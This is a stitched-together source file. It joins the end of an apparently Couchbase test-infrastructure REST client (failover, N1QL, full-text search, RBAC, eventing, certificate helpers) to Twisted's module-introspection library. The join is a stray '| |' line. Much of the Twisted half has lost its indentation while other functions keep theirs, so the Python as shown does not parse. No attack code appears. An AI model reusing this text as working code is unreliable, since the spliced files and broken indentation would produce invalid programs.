        data = json.dumps(ddoc)
        headers = {'Content-type': 'application/json'}
        self.put(url=api, data=data, headers=headers)

    def query_view(self, host: str, bucket: str, ddoc_name: str,
                   view_name: str, params: dict):
        logger.info('Querying view: {}/_design/{}/_view/{}'.format(
            bucket, ddoc_name, view_name
        ))
        api = 'http://{}:8091/couchBase/{}/_design/{}/_view/{}'.format(
            host, bucket, ddoc_name, view_name)
        self.get(url=api, params=params)

    # ---- Server introspection --------------------------------------------

    def get_version(self, host: str) -> str:
        logger.info('Getting Couchbase Server version')
        api = 'http://{}:8091/pools/'.format(host)
        r = self.get(url=api).json()
        # Strip the edition suffixes, leaving only the version number.
        return r['implementationVersion'] \
            .replace('-rel-enterprise', '') \
            .replace('-enterprise', '') \
            .replace('-community', '')

    def is_community(self, host: str) -> bool:
        logger.info('Getting Couchbase Server edition')
        api = 'http://{}:8091/pools/'.format(host)
        r = self.get(url=api).json()
        return 'community' in r['implementationVersion']

    def get_memcached_port(self, host: str) -> int:
        logger.info('Getting memcached port from {}'.format(host))
        api = 'http://{}:8091/nodes/self'.format(host)
        r = self.get(url=api).json()
        return r['ports']['direct']

    def get_otp_node_name(self, host: str) -> str:
        logger.info('Getting OTP node name from {}'.format(host))
        api = 'http://{}:8091/nodes/self'.format(host)
        r = self.get(url=api).json()
        return r['otpNode']

    def set_internal_settings(self, host: str, data: dict):
        logger.info('Updating internal settings: {}'.format(data))
        api = 'http://{}:8091/internalSettings'.format(host)
        self.post(url=api, data=data)

    def set_xdcr_cluster_settings(self, host: str, data: dict):
        logger.info('Updating xdcr cluster settings: {}'.format(data))
        api = 'http://{}:8091/settings/replications'.format(host)
        self.post(url=api, data=data)

    def run_diag_eval(self, host: str, cmd: str):
        # Executes arbitrary Erlang on the server; test-infra only.
        api = 'http://{}:8091/diag/eval'.format(host)
        self.post(url=api, data=cmd)

    # ---- Failover --------------------------------------------------------

    def enable_auto_failover(self, host: str):
        logger.info('Enabling auto-failover with the minimum timeout')
        api = 'http://{}:8091/settings/autoFailover'.format(host)
        # Try the 5s timeout first; older servers reject it, so fall back
        # to 30s when the first POST is not accepted.
        for timeout in 5, 30:
            data = {'enabled': 'true',
                    'timeout': timeout,
                    'failoverOnDataDiskIssues[enabled]': 'true',
                    'failoverOnDataDiskIssues[timePeriod]': 10
                    }
            r = self._post(url=api, data=data)
            if r.status_code == 200:
                break

    def get_certificate(self, host: str) -> str:
        logger.info('Getting remote certificate')
        api = 'http://{}:8091/pools/default/certificate'.format(host)
        return self.get(url=api).text

    def fail_over(self, host: str, node: str):
        logger.info('Failing over node: {}'.format(node))
        api = 'http://{}:8091/controller/failOver'.format(host)
        data = {'otpNode': self.get_otp_node_name(node)}
        self.post(url=api, data=data)

    def graceful_fail_over(self, host: str, node: str):
        logger.info('Gracefully failing over node: {}'.format(node))
        api = 'http://{}:8091/controller/startGracefulFailover'.format(host)
        data = {'otpNode': self.get_otp_node_name(node)}
        self.post(url=api, data=data)

    def add_back(self, host: str, node: str):
        logger.info('Adding node back: {}'.format(node))
        api = 'http://{}:8091/controller/reAddNode'.format(host)
        data = {'otpNode': self.get_otp_node_name(node)}
        self.post(url=api, data=data)

    def set_delta_recovery_type(self, host: str, node: str):
        logger.info('Enabling delta recovery: {}'.format(node))
        api = 'http://{}:8091/controller/setRecoveryType'.format(host)
        data = {
            'otpNode': self.get_otp_node_name(node),
            'recoveryType': 'delta'  # alt: full
        }
        self.post(url=api, data=data)

    # ---- Node status and stats -------------------------------------------

    def node_statuses(self, host: str) -> dict:
        api = 'http://{}:8091/nodeStatuses'.format(host)
        data = self.get(url=api).json()
        return {node: info['status'] for node, info in data.items()}

    def node_statuses_v2(self, host: str) -> dict:
        api = 'http://{}:8091/pools/default'.format(host)
        data = self.get(url=api).json()
        return {node['hostname']: node['status'] for node in data['nodes']}

    def get_node_stats(self, host: str, bucket: str) -> Iterator:
        # Yields (hostname, samples) for every server hosting the bucket.
        api = 'http://{}:8091/pools/default/buckets/{}/nodes'.format(host,
                                                                     bucket)
        data = self.get(url=api).json()
        for server in data['servers']:
            api = 'http://{}:8091{}'.format(host, server['stats']['uri'])
            data = self.get(url=api).json()
            yield data['hostname'], data['op']['samples']

    def get_vbmap(self, host: str, bucket: str) -> dict:
        logger.info('Reading vbucket map: {}/{}'.format(host, bucket))
        api = 'http://{}:8091/pools/default/buckets/{}'.format(host, bucket)
        data = self.get(url=api).json()
        return data['vBucketServerMap']['vBucketMap']

    def get_server_list(self, host: str, bucket: str) -> List[str]:
        api = 'http://{}:8091/pools/default/buckets/{}'.format(host, bucket)
        data = self.get(url=api).json()
        # Strip the port, keeping only host names/addresses.
        return [server.split(':')[0]
                for server in data['vBucketServerMap']['serverList']]

    # ---- N1QL ------------------------------------------------------------

    def exec_n1ql_statement(self, host: str, statement: str) -> dict:
        api = 'http://{}:8093/query/service'.format(host)
        data = {
            'statement': statement,
        }
        response = self.post(url=api, data=data)
        return response.json()

    def explain_n1ql_statement(self, host: str, statement: str):
        statement = 'EXPLAIN {}'.format(statement)
        return self.exec_n1ql_statement(host, statement)

    def get_query_stats(self, host: str) -> dict:
        logger.info('Getting query engine stats')
        api = 'http://{}:8093/admin/stats'.format(host)
        response = self.get(url=api)
        return response.json()

    # ---- Full-text search and Elasticsearch ------------------------------

    def delete_fts_index(self, host: str, index: str):
        logger.info('Deleting FTS index: {}'.format(index))
        api = 'http://{}:8094/api/index/{}'.format(host, index)
        self.delete(url=api)

    def create_fts_index(self, host: str, index: str, definition: dict):
        logger.info('Creating a new FTS index: {}'.format(index))
        api = 'http://{}:8094/api/index/{}'.format(host, index)
        headers = {'Content-Type': 'application/json'}
        data = json.dumps(definition, ensure_ascii=False)
        self.put(url=api, data=data, headers=headers)

    def get_fts_doc_count(self, host: str, index: str) -> int:
        api = 'http://{}:8094/api/index/{}/count'.format(host, index)
        response = self.get(url=api).json()
        return response['count']

    def get_fts_stats(self, host: str) -> dict:
        api = 'http://{}:8094/api/nsstats'.format(host)
        response = self.get(url=api)
        return response.json()

    def get_elastic_stats(self, host: str) -> dict:
        api = "http://{}:9200/_stats".format(host)
        response = self.get(url=api)
        return response.json()

    def delete_elastic_index(self, host: str, index: str):
        logger.info('Deleting Elasticsearch index: {}'.format(index))
        api = 'http://{}:9200/{}'.format(host, index)
        self.delete(url=api)

    def create_elastic_index(self, host: str, index: str, definition: dict):
        logger.info('Creating a new Elasticsearch index: {}'.format(index))
        api = 'http://{}:9200/{}'.format(host, index)
        headers = {'Content-Type': 'application/json'}
        data = json.dumps(definition, ensure_ascii=False)
        self.put(url=api, data=data, headers=headers)

    def get_elastic_doc_count(self, host: str, index: str) -> int:
        api = "http://{}:9200/{}/_count".format(host, index)
        response = self.get(url=api).json()
        return response['count']

    # ---- GSI stats -------------------------------------------------------

    def get_index_status(self, host: str) -> dict:
        api = 'http://{}:9102/getIndexStatus'.format(host)
        response = self.get(url=api)
        return response.json()

    def get_index_stats(self, hosts: List[str]) -> dict:
        # Merge the per-host stats dicts into a single mapping.
        api = 'http://{}:9102/stats'
        data = {}
        for host in hosts:
            host_data = self.get(url=api.format(host))
            data.update(host_data.json())
        return data

    def get_index_num_connections(self, host: str) -> int:
        api = 'http://{}:9102/stats'.format(host)
        response = self.get(url=api).json()
        return response['num_connections']

    def get_index_storage_stats(self, host: str) -> str:
        api = 'http://{}:9102/stats/storage'.format(host)
        return self.get(url=api).text

    def get_index_storage_stats_mm(self, host: str) -> str:
        api = 'http://{}:9102/stats/storage/mm'.format(host)
        return self.get(url=api).text

    # ---- Audit and RBAC --------------------------------------------------

    def get_audit_settings(self, host: str) -> dict:
        logger.info('Getting current audit settings')
        api = 'http://{}:8091/settings/audit'.format(host)
        return self.get(url=api).json()

    def enable_audit(self, host: str, disabled: List[str]):
        logger.info('Enabling audit')
        api = 'http://{}:8091/settings/audit'.format(host)
        data = {
            'auditdEnabled': 'true',
        }
        if disabled:
            data['disabled'] = ','.join(disabled)
        self.post(url=api, data=data)

    def get_rbac_roles(self, host: str) -> List[dict]:
        logger.info('Getting the existing RBAC roles')
        api = 'http://{}:8091/settings/rbac/roles'.format(host)
        return self.get(url=api).json()

    def delete_rbac_user(self, host: str, bucket: str):
        logger.info('Deleting an RBAC user: {}'.format(bucket))
        # The auth domain name changed across server versions; try both
        # and stop at the first that succeeds.
        for domain in 'local', 'builtin':
            api = 'http://{}:8091/settings/rbac/users/{}/{}'.format(host,
                                                                    domain,
                                                                    bucket)
            r = self._delete(url=api)
            if r.status_code == 200:
                break

    def add_rbac_user(self, host: str, user: str, password: str,
                      roles: List[str]):
        logger.info('Adding an RBAC user: {}, roles: {}'.format(user,
                                                                roles))
        data = {
            'password': password,
            'roles': ','.join(roles),
        }
        # Same domain-name fallback as delete_rbac_user.
        for domain in 'local', 'builtin':
            api = 'http://{}:8091/settings/rbac/users/{}/{}'.format(host,
                                                                    domain,
                                                                    user)
            r = self._put(url=api, data=data)
            if r.status_code == 200:
                break

    # ---- Analytics -------------------------------------------------------

    def analytics_node_active(self, host: str) -> bool:
        logger.info('Checking if analytics node is active: {}'.format(host))
        api = 'http://{}:{}/analytics/cluster'.format(host, ANALYTICS_PORT)
        status = self.get(url=api).json()
        return status["state"] == "ACTIVE"

    def exec_analytics_statement(self, analytics_node: str,
                                 statement: str) -> requests.Response:
        api = 'http://{}:{}/analytics/service'.format(analytics_node,
                                                      ANALYTICS_PORT)
        data = {
            'statement': statement
        }
        return self.post(url=api, data=data)

    def get_analytics_stats(self, analytics_node: str) -> dict:
        api = 'http://{}:9110/analytics/node/stats'.format(analytics_node)
        return self.get(url=api).json()

    # ---- Eventing --------------------------------------------------------

    def create_function(self, node: str, func: dict, name: str):
        logger.info('Creating function on node {}: {}'.format(node,
                                                              pretty_dict(func)))
        api = 'http://{}:8091/_p/event/saveAppTempStore/?name={}'.format(node,
                                                                         name)
        self.post(url=api, data=json.dumps(func))

    def deploy_function(self, node: str, func: dict, name: str):
        logger.info('Deploying function on node {}'.format(node))
        api = 'http://{}:8091/_p/event/setApplication/?name={}'.format(node,
                                                                       name)
        self.post(url=api, data=json.dumps(func))

    def get_num_events_processed(self, event: str, node: str, name: str) -> int:
        # Returns 0 when the function or the event counter is not found.
        logger.info('get stats on node {} for {}'.format(node, name))
        data = {}
        all_stats = self.get_eventing_stats(node=node)
        for stat in all_stats:
            if name == stat["function_name"]:
                data = stat["event_processing_stats"]
                break
        logger.info(data)
        if event in data:
            return data[event]
        return 0

    def get_deployed_apps(self, node: str):
        logger.info('get deployed apps on node {}'.format(node))
        api = 'http://{}:{}/getDeployedApps'.format(node, EVENTING_PORT)
        return self.get(url=api).json()

    def get_eventing_stats(self, node: str, full_stats: bool = False) -> dict:
        logger.info('get eventing stats on node {}'.format(node))
        api = 'http://{}:{}/api/v1/stats'.format(node, EVENTING_PORT)
        if full_stats:
            api += "?type=full"
        return self.get(url=api).json()

    def get_active_nodes_by_role(self, master_node: str, role: str) -> List[str]:
        # Intersect the cluster-spec role assignment with the nodes that
        # are actually present in the cluster right now.
        active_nodes = self.node_statuses(master_node)
        active_nodes_by_role = []
        for node in self.cluster_spec.servers_by_role(role):
            if node + ":8091" in active_nodes:
                active_nodes_by_role.append(node)
        return active_nodes_by_role

    # ---- Certificates ----------------------------------------------------

    def upload_cluster_certificate(self, node: str):
        logger.info("Uploading cluster certificate to {}".format(node))
        api = 'http://{}:8091/controller/uploadClusterCA'.format(node)
        # NOTE(review): file handle is never closed; consider `with open(...)`.
        data = open('./certificates/inbox/ca.pem', 'rb').read()
        self.post(url=api, data=data)

    def reload_cluster_certificate(self, node: str):
        logger.info("Reloading certificate on {}".format(node))
        api = 'http://{}:8091/node/controller/reloadCertificate'.format(node)
        self.post(url=api)

    def enable_certificate_auth(self, node: str):
        logger.info("Enabling certificate-based client auth on {}".format(node))
        api = 'http://{}:8091/settings/clientCertAuth'.format(node)
        # NOTE(review): file handle is never closed; consider `with open(...)`.
        data = open('./certificates/inbox/config.json', 'rb').read()
        self.post(url=api, data=data)
| |
# -*- test-case-name: twisted.test.test_modules -*-
# Copyright (c) 2006-2009 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
This module aims to provide a unified, object-oriented view of Python's
runtime hierarchy.
Python is a very dynamic language with wide variety of introspection utilities.
However, these utilities can be hard to use, because there is no consistent
API. The introspection API in python is made up of attributes (__name__,
__module__, func_name, etc) on instances, modules, classes and functions which
vary between those four types, utility modules such as 'inspect' which provide
some functionality, the 'imp' module, the "compiler" module, the semantics of
PEP 302 support, and setuptools, among other things.
At the top, you have "PythonPath", an abstract representation of sys.path which
includes methods to locate top-level modules, with or without loading them.
The top-level exposed functions in this module for accessing the system path
are "walkModules", "iterModules", and "getModule".
From most to least specific, here are the objects provided::
PythonPath # sys.path
|
v
PathEntry # one entry on sys.path: an importer
|
v
PythonModule # a module or package that can be loaded
|
v
PythonAttribute # an attribute of a module (function or class)
|
v
PythonAttribute # an attribute of a function or class
|
v
...
Here's an example of idiomatic usage: this is what you would do to list all of
the modules outside the standard library's python-files directory::
import os
stdlibdir = os.path.dirname(os.__file__)
from twisted.python.modules import iterModules
for modinfo in iterModules():
if (modinfo.pathEntry.filePath.path != stdlibdir
and not modinfo.isPackage()):
print 'unpackaged: %s: %s' % (
modinfo.name, modinfo.filePath.path)
"""
# Make all classes defined in this module new-style under Python 2.
__metaclass__ = type
# let's try to keep path imports to a minimum...
from os.path import dirname, split as splitpath
import sys
import zipimport
import inspect
import warnings
from zope.interface import Interface, implements
from twisted.python.components import registerAdapter
from twisted.python.filepath import FilePath, UnlistableError
from twisted.python.zippath import ZipArchive
from twisted.python.reflect import namedAny
# Sentinel distinct from None for "no value supplied" arguments.
_nothing = object()

PYTHON_EXTENSIONS = ['.py']
# When Python is run with -OO, docstrings (including this module's) are
# stripped, so __doc__ is None; pick the matching bytecode extension.
OPTIMIZED_MODE = __doc__ is None
if OPTIMIZED_MODE:
    PYTHON_EXTENSIONS.append('.pyo')
else:
    PYTHON_EXTENSIONS.append('.pyc')
def _isPythonIdentifier(string):
"""
cheezy fake test for proper identifier-ness.
@param string: a str which might or might not be a valid python identifier.
@return: True or False
"""
return (' ' not in string and
'.' not in string and
'-' not in string)
def _isPackagePath(fpath):
# Determine if a FilePath-like object is a Python package. TODO: deal with
# __init__module.(so|dll|pyd)?
extless = fpath.splitext()[0]
basend = splitpath(extless)[1]
return basend == "__init__"
class _ModuleIteratorHelper:
"""
This mixin provides common behavior between python module and path entries,
since the mechanism for searching sys.path and __path__ attributes is
remarkably similar.
"""
    def iterModules(self):
        """
        Loop over the modules present below this entry or package on PYTHONPATH.
        For modules which are not packages, this will yield nothing.
        For packages and path entries, this will only yield modules one level
        down; i.e. if there is a package a.b.c, iterModules on a will only
        return a.b. If you want to descend deeply, use walkModules.
        @return: a generator which yields PythonModule instances that describe
        modules which can be, or have been, imported.
        """
        # Track names already yielded so a module shadowed later on the
        # search path is not reported twice.
        yielded = {}
        if not self.filePath.exists():
            return
        for placeToLook in self._packagePaths():
            try:
                children = placeToLook.children()
            except UnlistableError:
                # Skip unlistable entries (permissions, bogus path entries).
                continue
            children.sort()
            for potentialTopLevel in children:
                ext = potentialTopLevel.splitext()[1]
                # NOTE(review): when ext == '' this slice yields '' (s[:-0]),
                # so the identifier check below is a no-op for
                # extension-less names — presumably benign; confirm.
                potentialBasename = potentialTopLevel.basename()[:-len(ext)]
                if ext in PYTHON_EXTENSIONS:
                    # TODO: this should be a little choosier about which path entry
                    # it selects first, and it should do all the .so checking and
                    # crud
                    if not _isPythonIdentifier(potentialBasename):
                        continue
                    modname = self._subModuleName(potentialBasename)
                    if modname.split(".")[-1] == '__init__':
                        # This marks the directory as a package so it can't be
                        # a module.
                        continue
                    if modname not in yielded:
                        yielded[modname] = True
                        pm = PythonModule(modname, potentialTopLevel, self._getEntry())
                        assert pm != self
                        yield pm
                else:
                    # Not a Python source/bytecode file: it may be a package
                    # directory; reject files and non-identifier names.
                    if (ext or not _isPythonIdentifier(potentialBasename)
                        or not potentialTopLevel.isdir()):
                        continue
                    modname = self._subModuleName(potentialTopLevel.basename())
                    # Directory counts as a package only if it contains an
                    # __init__ module with one of the known extensions.
                    for ext in PYTHON_EXTENSIONS:
                        initpy = potentialTopLevel.child("__init__"+ext)
                        if initpy.exists():
                            yielded[modname] = True
                            pm = PythonModule(modname, initpy, self._getEntry())
                            assert pm != self
                            yield pm
                            break
def walkModules(self, importPackages=False):
"""
Similar to L{iterModules}, this yields self, and then every module in my
package or entry, and every submodule in each package or entry.
In other words, this is deep, and L{iterModules} is shallow.
"""
yield self
for package in self.iterModules():
for module in package.walkModules(importPackages=importPackages):
yield module
def _subModuleName(self, mn):
"""
This is a hook to provide packages with the ability to specify their names
as a prefix to submodules here.
"""
return mn
def _packagePaths(self):
"""
Implement in subclasses to specify where to look for modules.
@return: iterable of FilePath-like objects.
"""
raise NotImplementedError()
def _getEntry(self):
"""
Implement in subclasses to specify what path entry submodules will come
from.
@return: a PathEntry instance.
"""
raise NotImplementedError()
def __getitem__(self, modname):
"""
Retrieve a module from below this path or package.
@param modname: a str naming a module to be loaded. For entries, this
is a top-level, undotted package name, and for packages it is the name
of the module without the package prefix. For example, if you have a
PythonModule representing the 'twisted' package, you could use::
twistedPackageObj['python']['modules']
to retrieve this module.
@raise: KeyError if the module is not found.
@return: a PythonModule.
"""
for module in self.iterModules():
if module.name == self._subModuleName(modname):
return module
raise KeyError(modname)
def __iter__(self):
"""
Implemented to raise NotImplementedError for clarity, so that attempting to
loop over this object won't call __getitem__.
Note: in the future there might be some sensible default for iteration,
like 'walkEverything', so this is deliberately untested and undefined
behavior.
"""
raise NotImplementedError()
class PythonAttribute:
    """
    I represent a function, class, or other object that is present.

    @ivar name: the fully qualified python name of the attribute represented by
    this class.

    @ivar onObject: a reference to a PythonModule or other PythonAttribute that
    is this attribute's logical parent.
    """
    def __init__(self, name, onObject, loaded, pythonValue):
        """
        Create a PythonAttribute.  This is a private constructor.  Do not
        construct me directly, use PythonModule.iterAttributes.

        @param name: the FQPN
        @param onObject: see ivar
        @param loaded: always True, for now
        @param pythonValue: the value of the attribute we're pointing to.
        """
        self.name = name
        self.onObject = onObject
        self._loaded = loaded
        self.pythonValue = pythonValue

    def __repr__(self):
        return 'PythonAttribute<%r>' % (self.name,)

    def isLoaded(self):
        """
        Return a boolean describing whether the attribute this describes has
        actually been loaded into memory by importing its module.

        Note: this currently always returns true; there is no Python parser
        support in this module yet.
        """
        return self._loaded

    def load(self, default=_nothing):
        """
        Load the value associated with this attribute.

        @return: an arbitrary Python object, or 'default' if there is an error
        loading it.
        """
        return self.pythonValue

    def iterAttributes(self):
        # Wrap every member of the underlying value in its own
        # PythonAttribute, qualifying each name with our own.
        for memberName, member in inspect.getmembers(self.load()):
            yield PythonAttribute(self.name + '.' + memberName, self, True, member)
class PythonModule(_ModuleIteratorHelper):
    """
    Representation of a module which could be imported from sys.path.

    @ivar name: the fully qualified python name of this module.

    @ivar filePath: a FilePath-like object which points to the location of this
    module.

    @ivar pathEntry: a L{PathEntry} instance which this module was located
    from.
    """
    def __init__(self, name, filePath, pathEntry):
        """
        Create a PythonModule.  Do not construct this directly, instead inspect a
        PythonPath or other PythonModule instances.

        @param name: see ivar
        @param filePath: see ivar
        @param pathEntry: see ivar
        """
        # Packages are represented by their own dotted name; a trailing
        # ".__init__" would be a construction error upstream.
        assert not name.endswith(".__init__")
        self.name = name
        self.filePath = filePath
        self.parentPath = filePath.parent()
        self.pathEntry = pathEntry

    def _getEntry(self):
        # Submodules discovered under this module belong to the same entry.
        return self.pathEntry

    def __repr__(self):
        """
        Return a string representation including the module name.
        """
        return 'PythonModule<%r>' % (self.name,)

    def isLoaded(self):
        """
        Determine if the module is loaded into sys.modules.

        @return: a boolean: true if loaded, false if not.
        """
        return self.name in self.pathEntry.pythonPath.moduleDict

    def iterAttributes(self):
        """
        List all the attributes defined in this module.

        Note: Future work is planned here to make it possible to list python
        attributes on a module without loading the module by inspecting ASTs or
        bytecode, but currently any iteration of PythonModule objects insists
        they must be loaded, and will use inspect.getmodule.

        @raise NotImplementedError: if this module is not loaded.

        @return: a generator yielding PythonAttribute instances describing the
        attributes of this module.
        """
        if not self.isLoaded():
            raise NotImplementedError(
                "You can't load attributes from non-loaded modules yet.")
        for name, val in inspect.getmembers(self.load()):
            yield PythonAttribute(self.name+'.'+name, self, True, val)

    def isPackage(self):
        """
        Returns true if this module is also a package, and might yield something
        from iterModules.
        """
        return _isPackagePath(self.filePath)

    def load(self, default=_nothing):
        """
        Load this module.

        @param default: if specified, the value to return in case of an error.

        @return: a genuine python module.

        @raise: any type of exception.  Importing modules is a risky business;
        the errors of any code run at module scope may be raised from here, as
        well as ImportError if something bizarre happened to the system path
        between the discovery of this PythonModule object and the attempt to
        import it.  If you specify a default, the error will be swallowed
        entirely, and not logged.

        @rtype: types.ModuleType.
        """
        try:
            return self.pathEntry.pythonPath.moduleLoader(self.name)
        except: # this needs more thought...
            if default is not _nothing:
                return default
            raise

    def __eq__(self, other):
        """
        PythonModules with the same name are equal.
        """
        if not isinstance(other, PythonModule):
            return False
        return other.name == self.name

    def __ne__(self, other):
        """
        PythonModules with different names are not equal.
        """
        if not isinstance(other, PythonModule):
            return True
        return other.name != self.name

    def walkModules(self, importPackages=False):
        # Optionally import packages before descending, so their __path__
        # attributes (possibly set at import time) can be honored below.
        if importPackages and self.isPackage():
            self.load()
        return super(PythonModule, self).walkModules(importPackages=importPackages)

    def _subModuleName(self, mn):
        """
        submodules of this module are prefixed with our name.
        """
        return self.name + '.' + mn

    def _packagePaths(self):
        """
        Yield a sequence of FilePath-like objects which represent path segments.
        """
        # Non-packages contain no submodules at all.
        if not self.isPackage():
            return
        if self.isLoaded():
            load = self.load()
            if hasattr(load, '__path__'):
                for fn in load.__path__:
                    if fn == self.parentPath.path:
                        # this should _really_ exist.
                        assert self.parentPath.exists()
                        yield self.parentPath
                    else:
                        # A __path__ entry elsewhere (e.g. added at runtime):
                        # resolve it through the owning PythonPath.
                        smp = self.pathEntry.pythonPath._smartPath(fn)
                        if smp.exists():
                            yield smp
        else:
            yield self.parentPath
class PathEntry(_ModuleIteratorHelper):
    """
    I am a proxy for a single entry on sys.path.

    @ivar filePath: a FilePath-like object pointing at the filesystem location
    or archive file where this path entry is stored.

    @ivar pythonPath: a PythonPath instance.
    """
    def __init__(self, filePath, pythonPath):
        """
        Create a PathEntry.  This is a private constructor.
        """
        self.filePath = filePath
        self.pythonPath = pythonPath

    def __repr__(self):
        return 'PathEntry<%r>' % (self.filePath,)

    def _getEntry(self):
        # A path entry is its own originating entry.
        return self

    def _packagePaths(self):
        # The only place to look for modules under a sys.path entry is the
        # entry's own directory (or archive).
        yield self.filePath
class IPathImportMapper(Interface):
    """
    This is an internal interface, used to map importers to factories for
    FilePath-like objects.
    """
    def mapPath(self, pathLikeString):
        """
        Return a FilePath-like object.

        @param pathLikeString: a path-like string, like one that might be
        passed to an import hook.

        @return: a L{FilePath}, or something like it (currently only a
        L{ZipPath}, but more might be added later).
        """
class _DefaultMapImpl:
    """ Wrapper for the default importer, i.e. None. """
    implements(IPathImportMapper)
    def mapPath(self, fsPathString):
        # Plain filesystem path entries map directly to FilePath objects.
        return FilePath(fsPathString)
# Singleton fallback mapper, used when no importer claims a path entry.
_theDefaultMapper = _DefaultMapImpl()
class _ZipMapImpl:
    """ IPathImportMapper implementation for zipimport.ZipImporter. """
    implements(IPathImportMapper)
    def __init__(self, importer):
        # The wrapped zipimport.zipimporter instance.
        self.importer = importer

    def mapPath(self, fsPathString):
        """
        Map the given FS path to a ZipPath, by looking at the ZipImporter's
        "archive" attribute and using it as our ZipArchive root, then walking
        down into the archive from there.

        @return: a L{zippath.ZipPath} or L{zippath.ZipArchive} instance.
        """
        za = ZipArchive(self.importer.archive)
        myPath = FilePath(self.importer.archive)
        itsPath = FilePath(fsPathString)
        # The path names the archive itself: return the archive root.
        if myPath == itsPath:
            return za
        # This is NOT a general-purpose rule for sys.path or __file__:
        # zipimport specifically uses regular OS path syntax in its pathnames,
        # even though zip files specify that slashes are always the separator,
        # regardless of platform.
        segs = itsPath.segmentsFrom(myPath)
        zp = za
        for seg in segs:
            zp = zp.child(seg)
        return zp
# Teach IPathImportMapper adaptation about zipimporter path entries, so that
# _smartPath() can produce ZipArchive/ZipPath objects for zipped entries.
registerAdapter(_ZipMapImpl, zipimport.zipimporter, IPathImportMapper)
def _defaultSysPathFactory():
"""
Provide the default behavior of PythonPath's sys.path factory, which is to
return the current value of sys.path.
@return: L{sys.path}
"""
return sys.path
class PythonPath:
    """
    I represent the very top of the Python object-space, the module list in
    sys.path and the modules list in sys.modules.

    @ivar _sysPath: a sequence of strings like sys.path.  This attribute is
    read-only.

    @ivar moduleDict: a dictionary mapping string module names to module
    objects, like sys.modules.

    @ivar sysPathHooks: a list of PEP-302 path hooks, like sys.path_hooks.

    @ivar moduleLoader: a function that takes a fully-qualified python name and
    returns a module, like twisted.python.reflect.namedAny.
    """
    def __init__(self,
                 sysPath=None,
                 moduleDict=sys.modules,
                 sysPathHooks=sys.path_hooks,
                 importerCache=sys.path_importer_cache,
                 moduleLoader=namedAny,
                 sysPathFactory=None):
        """
        Create a PythonPath.  You almost certainly want to use
        modules.theSystemPath, or its aliased methods, rather than creating a
        new instance yourself, though.

        All parameters are optional, and if unspecified, will use 'system'
        equivalents that makes this PythonPath like the global L{theSystemPath}
        instance.

        @param sysPath: a sys.path-like list to use for this PythonPath, to
        specify where to load modules from.

        @param moduleDict: a sys.modules-like dictionary to use for keeping
        track of what modules this PythonPath has loaded.

        @param sysPathHooks: sys.path_hooks-like list of PEP-302 path hooks to
        be used for this PythonPath, to determine which importers should be
        used.

        @param importerCache: a sys.path_importer_cache-like list of PEP-302
        importers.  This will be used in conjunction with the given
        sysPathHooks.

        @param moduleLoader: a module loader function which takes a string and
        returns a module.  That is to say, it is like L{namedAny} - *not* like
        L{__import__}.

        @param sysPathFactory: a 0-argument callable which returns the current
        value of a sys.path-like list of strings.  Specify either this, or
        sysPath, not both.  This alternative interface is provided because the
        way the Python import mechanism works, you can re-bind the 'sys.path'
        name and that is what is used for current imports, so it must be a
        factory rather than a value to deal with modification by rebinding
        rather than modification by mutation.  Note: it is not recommended to
        rebind sys.path; although this mechanism can deal with that, it is a
        subtle point which is easy for tools that interact with sys.path to
        miss.
        """
        # A fixed sysPath takes priority; otherwise fall back to the supplied
        # factory, and finally to the live sys.path.
        if sysPath is not None:
            sysPathFactory = lambda : sysPath
        elif sysPathFactory is None:
            sysPathFactory = _defaultSysPathFactory
        self._sysPathFactory = sysPathFactory
        self._sysPath = sysPath
        self.moduleDict = moduleDict
        self.sysPathHooks = sysPathHooks
        self.importerCache = importerCache
        self.moduleLoader = moduleLoader

    def _getSysPath(self):
        """
        Retrieve the current value of the module search path list.
        """
        return self._sysPathFactory()

    # A property so that rebinding of sys.path is observed on every access.
    sysPath = property(_getSysPath)

    def _findEntryPathString(self, modobj):
        """
        Determine where a given Python module object came from by looking at path
        entries.
        """
        topPackageObj = modobj
        # Walk up to the top-level package containing this module.
        while '.' in topPackageObj.__name__:
            topPackageObj = self.moduleDict['.'.join(
                    topPackageObj.__name__.split('.')[:-1])]
        if _isPackagePath(FilePath(topPackageObj.__file__)):
            # if package 'foo' is on sys.path at /a/b/foo, package 'foo's
            # __file__ will be /a/b/foo/__init__.py, and we are looking for
            # /a/b here, the path-entry; so go up two steps.
            rval = dirname(dirname(topPackageObj.__file__))
        else:
            # the module is completely top-level, not within any packages.  The
            # path entry it's on is just its dirname.
            rval = dirname(topPackageObj.__file__)
        # There are probably some awful tricks that an importer could pull
        # which would break this, so let's just make sure... it's a loaded
        # module after all, which means that its path MUST be in
        # path_importer_cache according to PEP 302 -glyph
        if rval not in self.importerCache:
            warnings.warn(
                "%s (for module %s) not in path importer cache "
                "(PEP 302 violation - check your local configuration)." % (
                    rval, modobj.__name__),
                stacklevel=3)
        return rval

    def _smartPath(self, pathName):
        """
        Given a path entry from sys.path which may refer to an importer,
        return the appropriate FilePath-like instance.

        @param pathName: a str describing the path.

        @return: a FilePath-like object.
        """
        importr = self.importerCache.get(pathName, _nothing)
        if importr is _nothing:
            for hook in self.sysPathHooks:
                try:
                    importr = hook(pathName)
                except ImportError:
                    # FIX: was `except ImportError, ie:` (Python 2-only syntax)
                    # binding a never-used name.  A hook raising ImportError
                    # simply declines to handle this path entry.
                    pass
            if importr is _nothing: # still
                importr = None
        return IPathImportMapper(importr, _theDefaultMapper).mapPath(pathName)

    def iterEntries(self):
        """
        Iterate the entries on my sysPath.

        @return: a generator yielding PathEntry objects
        """
        for pathName in self.sysPath:
            fp = self._smartPath(pathName)
            yield PathEntry(fp, self)

    def __getitem__(self, modname):
        """
        Get a python module by a given fully-qualified name.

        @return: a PythonModule object.

        @raise: KeyError, if the module cannot be found on this path.
        """
        # See if the module is already somewhere in Python-land.
        if modname in self.moduleDict:
            # we need 2 paths; one of the path entry and one for the module.
            moduleObject = self.moduleDict[modname]
            pe = PathEntry(
                self._smartPath(
                    self._findEntryPathString(moduleObject)),
                self)
            mp = self._smartPath(moduleObject.__file__)
            return PythonModule(modname, mp, pe)

        # Recurse if we're trying to get a submodule.
        if '.' in modname:
            pkg = self
            for name in modname.split('.'):
                pkg = pkg[name]
            return pkg

        # Finally do the slowest possible thing and iterate
        for module in self.iterModules():
            if module.name == modname:
                return module
        raise KeyError(modname)

    def __repr__(self):
        """
        Display my sysPath and moduleDict in a string representation.
        """
        return "PythonPath(%r,%r)" % (self.sysPath, self.moduleDict)

    def iterModules(self):
        """
        Yield all top-level modules on my sysPath.
        """
        for entry in self.iterEntries():
            for module in entry.iterModules():
                yield module

